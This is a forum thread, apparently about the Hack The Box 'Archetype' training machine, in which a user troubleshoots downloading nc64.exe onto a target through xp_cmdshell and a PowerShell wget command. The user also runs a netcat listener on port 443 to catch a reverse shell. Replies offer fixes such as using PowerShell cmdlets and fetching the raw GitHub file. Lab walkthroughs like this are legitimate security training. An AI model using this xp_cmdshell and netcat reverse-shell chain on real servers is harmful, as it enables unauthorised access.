Archetype:The specified executable is not a valid application for this OS platform

I have been struggling with the archetype box.
when i run this command:
xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget -outfile nc64.exe”

I get a operation has timed out error, but i still see it on my ‘server’(the sudo python3 -m http.server 80 thingy)

but then if i try to run the next command it tells me that it isn’t a valid executable(i have tried it with nc.exe and nc64.exe)

my file structure is:, nc.exe, nc64.exe are in the same folder.
from wich i ran the http.server and the “sudo nc -lvnp 443” command
any help is really appreciated

You need to find out a some script in powershell that you don’t use a binary to download the file of server, like “nc”. It’s all you need.

If you see the output of the error, the binary that you using to dowload the file of your server, it is not compatible with the OS.

Googled a some powershell script that using cmdlets to solve this issue.

Make sure you have downloaded nc64.exe correctly to your machine.

For example, if you initially download it from Github using a wget command, you need to download the raw file, not the Github page:


Alternatively, download nc64.exe from Github through your browser.

Source: I used wget and accidentally left the ?raw=true part off, then struggled for a few hours on this.

1 Like